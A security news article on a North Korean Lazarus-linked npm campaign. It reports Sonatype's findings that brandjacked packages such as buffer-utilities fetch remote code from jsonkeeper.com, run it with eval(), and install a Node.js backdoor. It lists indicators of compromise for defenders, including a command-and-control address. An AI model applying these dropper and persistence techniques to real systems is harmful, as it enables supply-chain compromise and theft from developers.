A new npm campaign linked to North Korea’s Lazarus Group shows how attackers are using familiar-looking package names to gain access to developers’ systems and software build environments.
Sonatype Security Research said it is tracking dozens of malicious npm packages connected to the campaign, including some that reached up to 500 weekly downloads. The packages were designed to look related to trusted JavaScript projects and tools, increasing the chance that developers would install them during normal work.
Usually, hackers exploit techniques like typosquatting in such attacks; however, in this case, Sonatype found packages using brandjacking methods such as suffix additions, embedded project names, and version mimicry. Some of the examples spotted by researchers included names built around well known projects such as Buffer, Chai, React, Express, JWT, and Webpack.
That naming strategy is more likely to work in favor of attackers because npm is full of small helper libraries, wrappers, and plugins. A package called buffer-utilities , for example, can appear to be a reasonable companion to the widely used buffer package, even if it has no legitimate connection to the project.
Sonatype’s analysis of buffer-utilities found that the package included copied code from the real buffer library, but also worked as a malicious dropper. Once installed, it decoded Base64 encoded URLs, fetched remote content from www.jsonkeeper.com , and executed the retrieved code using eval() .
Researchers said that the pattern appeared in other packages linked to the same Lazarus activity . The use of www.jsonkeeper.com is also notable because Sonatype has previously observed Lazarus using the service to host payloads.
After the first stage runs, the malware can install a Node.js backdoor and downloader. That payload collects basic system details, including the hostname, username, operating system, home directory, and process arguments. It then contacts the command and control infrastructure to receive further instructions.
The malware can also create a hidden .vscode directory in the user’s home folder, download more files, and launch attacker controlled JavaScript as a detached background process. Sonatype said the package can fetch a third stage payload called f.js along with a package.json file, then run npm install --silent before starting the payload.
That behavior gives the attacker a way to maintain access and refresh malicious files over time. Sonatype also reported an update mechanism that lets the payload reconnect to command and control servers, check for newer versions, and replace local files.
The campaign shows why npm remains attractiv e to advanced threat actors. Developers often install packages based on name familiarity, project fit, or convenience, especially in JavaScript environments where small dependencies are common.
The Lazarus connection adds weight to the findings. While the group is often associated with financial theft and high profile cyber espionage operations , this activity shows the group’s interest in developer machines, credentials, build systems, and long term access to enterprise environments.
Organizations that installed buffer-utilities version 1.0.0 or packages associated with Sonatype identifier sonatype-2026-003558 should remove them and review affected systems for signs of further compromise. Sonatype warned that removal alone may not be enough if later payloads have already run.
Administrators should also check for network connections to www.jsonkeeper.com, command and control traffic to 45.59.163.198:1244, unexpected .vscode folders in user home directories, unusual Node.js processes, and any unexplained credential access from developer workstations or build systems.
Your email address will not be published. Required fields are marked *